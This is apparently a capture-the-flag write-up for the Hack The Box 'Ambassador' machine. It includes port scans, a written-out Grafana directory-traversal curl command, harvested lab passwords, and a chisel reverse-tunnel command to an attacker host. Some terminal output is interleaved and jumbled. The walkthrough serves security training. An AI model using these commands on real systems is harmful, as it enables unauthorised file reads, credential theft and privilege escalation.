PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Hugo 0.94.2 |_http-title: Ambassador Development Server |_http-server-header: Apache/2.4.41 (Ubuntu) 3000/tcp open ppp? 3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
Straight off the bat we get a username from the web server.
We see from the website source it’s running Hugo 0.94.2, “a static HTML and CSS website generator written in Go”. There’s no immediately obvious CVE so will carry on. There’s not a lot else obvious here, so next we look at port 3000 running another HTTP server.
We find Grafana versions below 8.3 are vulnerable to LFI (https://www.exploit-db.com/exploits/50581) and directory transversal, so we can read files on the server, we can begin to explore config files. Inside Grafana’s config file (/etc/grafana/grafana.ini) we find some credentials.
#################################### Security #################################### │└─$ nc 10.129.33.213 -v
[security] │no port[s] to connect to
# disable creation of admin user on first start of grafana │
;disable_initial_admin_creation = false │┌──(kali㉿kali)-[/htb/ambassador]
│└─$ nc 10.129.33.213 3000 -v
# default admin user, created on startup │ambassador.htb [10.129.33.213] 3000 (?) open
;admin_user = admin │?
│HTTP/1.1 400 Bad Request
# default admin password, can be changed before first start of grafana, or in profile settings │Content-Type: text/plain; charset=utf-8
admin_password = messageInABottle685427 │Connection: close
│
# used for signing │400 Bad Request
;secret_key = SW2YcwTIb9zpOOhoPsMm These creds allow us to login to the Grafana dashboard.
We can also dump the SQLite database and the MySQL password
curl --path-as-is http://ambassador.htb:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
sqlite> select * from data_source
...> ;
2|1|1|mysql|mysql.yaml|proxy||t|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2022-10-11 08:34:17|0|{}|1|uKewFgM4zUsing these credentials we can log into the MySQL database on port and eventually find credentials inside one of the tables.
MySQL [grafana]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [whackywidget]> show tables
-> ;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+
1 row in set (0.024 sec)
MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.047 sec)
I notice there’s some open ports running internally… one of which is Consul Agent, a process run by Root, so set up a chisel proxy to take a look.
#on the box developer@ambassador:/tmp$ ./chisel client 10.10.14.53:9999 R:8500:127.0.0.1:8500 #in kali ./chisel server -p 9999 --reverse
It appears we don’t have auth token to do any of the public exploits, so back to digging around.
Inside /opt/my-app we find a .git with a consul token in one of the commits
With this newly found token, we can try some of the public exploits. The first and most obvious is a Metasploit module.
And just like that we’re root and we get the flag.
For a medium difficulty room it’s very much on the easy side in terms of complexity but there’s a lot of enumeration and digging to do. A nice room with no significant difficult spikes.